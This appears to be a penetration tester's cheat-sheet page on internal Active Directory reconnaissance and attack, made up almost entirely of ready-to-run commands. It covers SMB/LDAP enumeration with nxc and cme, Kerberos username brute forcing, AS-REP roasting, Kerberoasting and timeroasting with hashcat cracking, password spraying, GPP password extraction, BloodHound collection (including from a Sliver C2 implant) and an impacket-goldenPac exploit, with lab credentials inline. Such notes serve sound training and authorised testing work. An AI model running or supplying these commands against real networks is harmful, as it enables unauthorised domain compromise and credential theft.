08-Internal-Recon

Scanning

Database Setup

• Setting up nxc workspace

nxcdb

workspace create <name_of_the_company>

workspace <name>

exit

• Setting ups msfconsole workspace

sudo msfdb init

sudo msfconsole

workspace -a <name_of_the_company>

workspace zephyr

db_nmap -sV -sS -sU -A -O -p- $CIDR

• If ping is blocked use the following, it tends to take more time

db_nmap -sV -sS -sU -A -O -p- $CIDR -Pn

Finding AD related attack machines while the nmap scan is running

• Once the setup is finished we could start enumerating the machines

nxc smb $CIDR | awk '/^SMB/ {print $2}' > smb_ips.txt

nxc ldap $CIDR | awk '/^LDAP/ {print $2}' > ldap_ips.txt

nxc mssql $CIDR | awk '/^MSSQL/ {print $2}' > mssql_ips.txt

nxc nfs $CIDR | awk '/^NFS/ {print $2}' > nfs_ips.txt

nxc ftp $CIDR -u anonymous -p anonymous

nxc ssh $IP/CIDR | awk '/^SSH/ {print $2}' > ssh_ips.txt

nxc winrm $IP/CIDR | awk '/^WINRM {print $2}' > winrm_ips.txt

• if Status not supported error then ntlm authentication is not supported.
• We could configure krb5.conf, hosts file and then use -k flag in the nxc (Do it anyway).

nxc smb ip -u $USER -p $PASSWORD --generate-krb5-file ./krb5.conf

export KRB5_CONFIG=/path

or

sudo cp /etc/krb5.conf

• Ff you don’t have krb5-user installed use the following command

sudo apt install krb5-user

nxc smb ips.txt -u '' -p ''

cme smb ips.txt -u '' -p '' --shares

nxc smb DC-JPQ225 -u Rosie.Powell -p 'Cicada123' -d cicada.vl -k --shares

cme smb ips.txt -u 'guest' -p '' --shares

smbclient.py 'guest@10.10.76.112'

smbclient.py 'cicada.vl/rosie.powell@DC-JPQ225' -k

SMB signing

In a secure AD environment smb signing must be true everywhere to avoid ntlm relay attack.

Enumerate DC ip

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

Poison and Relay

Do this at the start of your internal recon. Poison and relay

Enumerate DC anonymously

Only possible when anonymous signing is allowed on the DC.

enumerate users

cme smb $IP --users

cme ldap $IP --users

ldapsearch -x -H ldap://10.10.66.196 -b "DC=baby,DC=vl" "(objectClass=user)" sAMAccountName | grep "^sAMAccountName:" | awk '{print $2}' > users.txt

Do all the type of user enumeration. Sometimes the tool missies something

impacket-lookupsid anonymous@10.10.81.153

enumerate user description

nxc ldap 10.10.77.248 -u '' -p '' -M user-desc

enumerate password policy before brute force

cme smb $IP --pass-pol

enumerate auto with enum4linux

enum4linux 192.168.56.11

enumerate manually

rpcclient -U "Domain(But anything works here)\\" 192.168.56.11 -N

net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'

List guest access on shares

cme smb $IP -u '' -p '' --shares
cme smb $IP -u 'a' -p '' --shares

Ntlm theft when we have write access on a share

Ntlm theft by uploading files on SMB share

Enumerate DC’s anonymously - when anonymous sessions are not allowed

Create a user list

If anonymous login is not allowed on the DC which is the case most of the time. we could brute force the users using kerberos.

This way we can bypass the bad password count.

^60e6f3

User Enum through Brute force

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='domain name (eg.sevenkingdoms.local)',userdb=got_users.txt" $IP

./kerbrute_linux_amd64 userenum --dc dc.office.htb -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

cme smb 10.10.79.192 -u 'meow' -p '' --rid-brute

• Discovers valid usernames by brute force querying likely usernames against a Kerberos service.

• When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, allowing us to determine that the user name was invalid.

• Valid user names will illicit either the TGT in a AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, signaling that the user is required to perform pre authentication.

• This does not trigger Microsoft’s account lockout policy.

Users but No Credentials

AS-REP Roasting

impacket-GetNPUsers bruno.vl/svc_scan -no-pass -request

hashcat svc_scan_hash /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

^f7f50f

Password Spraying if no password lockout policy

cme smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success

Enumerate DC with Creds

GetADUsers.py -all domain/username:password

ldapsearch -H ldap://$IP$ -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'

User the above password spraying techniques to fish for users with bad passwords.

Time Roasting Attack

nxc smb 10.1.15.4 -M timeroast | grep -oP '\d+:\$sntp-ms\$[a-f0-9$]+' > timeroast_clean.txt

hashcat -m 31300 timeroast_clean.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt --username

• Make a clean list of it and crack it with hashcat
• Look the 1st part rid type thing in bloodhound to find the associated computer account.

Having valid domain creds

Check ASREPROAST and KERBEROAST

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --asreproast ASREPROAST

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting KERBEROASTING

crackmapexec smb 10.10.254.37 -u samuel.davies -p l6fkiy9oN -M gpp_password

Kerberoasting

^073601

Clock Skew

• Incase not able to do it with ntpdate because you are in virutal box with hardware utc

sudo date -s "$(ntpdate -q $domaicontroller | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')"

Share enum with creds

cme smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares

Accessing the shares

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'

Blood Hound

From Kali

bloodhound.py --zip -c All -d $Domain$ -u user@domain -p password -dc dc.domain.local

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --bloodhound -c all -ns 10.10.91.0

nxc ldap 10.10.11.5 -u mikasaAckerman -p 'IL0v3ErenY3ager'  --bloodhound -c All -d freelancer.htb --dns-server 10.10.11.5

bloodhound-python --zip -c All -d lustrous2.vl -u Thomas.myers@lustrous2.vl -dc lus2dc.lustrous2.vl --auth-method kerberos -ns 10.10.119.13 --use-ldaps

From Windows

 
.\sharphound.exe -d domain -c all --zipfilename any_name.zip

From Sliver C2

Execute it from the directory where the user has write access.

sharp-hound-4 -i -- "-c all"

Hunting with Blood Hound

show all domains and computer

MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p

And show all the users

MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p

Overall map of domains/groups/users

MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q

 the users ACL

MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p

Unconstrained Delegation

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2

Resources on Blood hound query

• https://en.hackndo.com/bloodhound/
• https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

SamAccountName (nopac)

SamAccountName (nopac) CVE-2021-42287

PrintNightmare

PrintNightmare

MS16-068

impacket-goldenPac $DOomin/$User:$Password@10.1.15.100 

Move back to Host Recon or AD Recon below

4. Host Recon

ADtool and Pbis linux

https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap

Getting users with descritptions

./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done

AD Recon (Having Shell Access)

DACL

Manual Enumeration

Delegation

Delegation